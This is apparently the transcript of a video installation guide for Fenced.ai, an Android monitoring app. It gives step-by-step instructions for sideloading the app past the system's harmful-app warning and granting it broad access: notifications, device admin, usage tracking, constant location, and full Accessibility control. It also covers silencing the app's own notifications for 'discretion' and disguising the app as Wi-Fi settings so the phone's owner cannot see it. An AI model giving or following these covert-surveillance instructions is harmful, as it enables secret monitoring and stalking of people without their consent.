Welcome to Fenced.ai installation guide for Android devices. This video will walk you through the installation and initial setup of Fenced.ai for Android device. After purchasing the plans you chose, you will be directed to a page to select the device you wish to monitor. Click on Add Android Device. Next page is where you install the APK file. You can install it by scanning the QR code or clicking the Get the app from here. Type the password 1234 and click Unlock to download the APK file. Tap on the APK file, then install. It says the app is harmful because it's unavailable in App Store. However, our app is virus-free and safe. Click on Details and then on Install anyway. Open the app. Enable notification access, allowing the Wi-Fi app to read all the phone notifications. Enter the device name. Allow the Wi-Fi app to read all the phone notifications. Activate the device admin app. Allow from unknown source. Go back and it will take you to usage access data. Scroll down, then select Wi-Fi and allow usage tracking. Go back and permit Wi-Fi to appear in the top. Log in using your credentials. Right after logging in, it will ask to disable notifications. Disabling the notification will reframe the phone to get any notification from Fenced.ai to maintain discretion. Go back and the app will have various permission. Click on OK. Go to Permissions and click Allow on all of them. If there is an additional option to allow all the time, like for location, click on Allow all the time. Click OK to Tracking User Application. After clicking OK, it will take you to Accessibility. Go to Installed Services and turn on the Wi-Fi access. After turning it on, the app will ask you to allow Wi-Fi to control the phone completely. Tap on Allow. Turn on the language settings. The final step is to tap on Hide Application. Hiding the application will allow the app to be a cover-up of the phone's Wi-Fi settings. So, it will take anyone who opens the app to the Wi-Fi settings.